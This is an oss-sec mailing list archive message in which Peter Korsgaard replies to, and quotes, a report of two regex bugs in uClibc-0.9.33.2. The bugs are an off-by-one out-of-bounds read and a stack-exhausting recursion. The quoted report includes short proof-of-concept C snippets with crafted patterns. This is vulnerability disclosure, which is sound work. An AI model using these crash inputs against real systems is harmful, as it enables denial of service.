oss-sec mailing list archives

Re: two vulns in uClibc-0.9.33.2

From: Peter Korsgaard <peter () korsgaard com>
Date: Fri, 16 Jun 2017 15:12:46 +0200

"fefe" == fefe  <qbenjin () qq com> writes:

I found two vulns in  uClibc-0.9.33.2 (https://uclibc.org/)


uClibc is dead. Active development happens on uClibc-ng. Is uClibc-ng
also affected by these issues?

one is about line 2682 of get_subexp.c :


I take it you are referring to libc/misc/regex/regexec.c?

             if (BE (bkref_str_off >= mctx->input.valid_len, 0))
             {
               /* If we are at the end of the input, we cannot match.  */
               if (bkref_str_off >= mctx->input.len)
                 break;

               err = extend_buffers (mctx);
               if (BE (err != REG1_NOERROR, 0))
                 return err;

               buf = (const char *) re_string_get_buffer (&mctx->input);
             }
           if (buf [bkref_str_off++] != buf[sl_str - 1])
             break; /* We don't need to search this sub expression

"bkref_str_off >= mctx->input.valid_len" , when  bkref_str_off == mctx->input.valid_len, "buf [bkref_str_off++] != 
buf[sl_str - 1]" case Out of one bit bounds read

The poc code like:

     if(regcomp (&regtmp,"(.+)upper\\1^", REG_EXTENDED|REG_ICASE | REG_NOSUB )==0)
     {               
             reg1match_t pmatch[1];
             regexec(&regtmp, "upperupperupperx",1, pmatch, 0);
             regfree(&regtmp);
     }

The another is aout line 1837 of regexce.c :

             check_dst_limits_calc_pos_1 (const re_match_context_t *mctx, int boundaries,
                          int subexp_idx, int from_node, int bkref_idx)
                .......

               cpos =
                 check_dst_limits_calc_pos_1 (mctx, boundaries, subexp_idx,
                                              dst, bkref_idx);

check_dst_limits_calc_pos_1 recursive calls case DDOS, because of stack exhaustion.

The poc code like:

     if(regcomp 
(&regtmp,"\x28\x2E\x3F\x3F\x28\x2E\x3F\x29\x5C\x42\x44\x3F\x3F\x28\x2E\x5C\x32\x29\x2A\x5C\x32\x28\x2E\x3F\x29\x5C\x32\x29\x2A\x5C\x32\xBD",
 REG_EXTENDED|REG_ICASE | REG_NOSUB )==0)
     {               
             reg1match_t pmatch[1];
             regexec(&regtmp, "\x72\xFF\xFF\xFF\xFF\xBD",1, pmatch, 0);
             regfree(&regtmp);
     }


-- 
Bye, Peter Korsgaard

Current thread:

two vulns in uClibc-0.9.33.2 fefe (Jun 15)
- Re: two vulns in uClibc-0.9.33.2 Andrej Nemec (Jun 15)
- Re: two vulns in uClibc-0.9.33.2 Zach W (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Peter Korsgaard (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Seth Arnold (Jun 16)
  - Re: two vulns in uClibc-0.9.33.2 Kurt Seifried (Jun 16)
  - Re: two vulns in uClibc-0.9.33.2 Michal Zalewski (Jun 16)
    - Re: two vulns in uClibc-0.9.33.2 Bob Friesenhahn (Jun 16)
    - Re: two vulns in uClibc-0.9.33.2 Florian Weimer (Jun 17)
    - Re: two vulns in uClibc-0.9.33.2 Michal Zalewski (Jun 17)
    - Re: two vulns in uClibc-0.9.33.2 Simon McVittie (Jun 17)
    - Re: two vulns in uClibc-0.9.33.2 Jakub Wilk (Jun 17)
- <Possible follow-ups>
- Re: two vulns in uClibc-0.9.33.2 fefe (Jun 20)
  - Re: two vulns in uClibc-0.9.33.2 Waldemar Brodkorb (Jun 23)

(Thread continues...)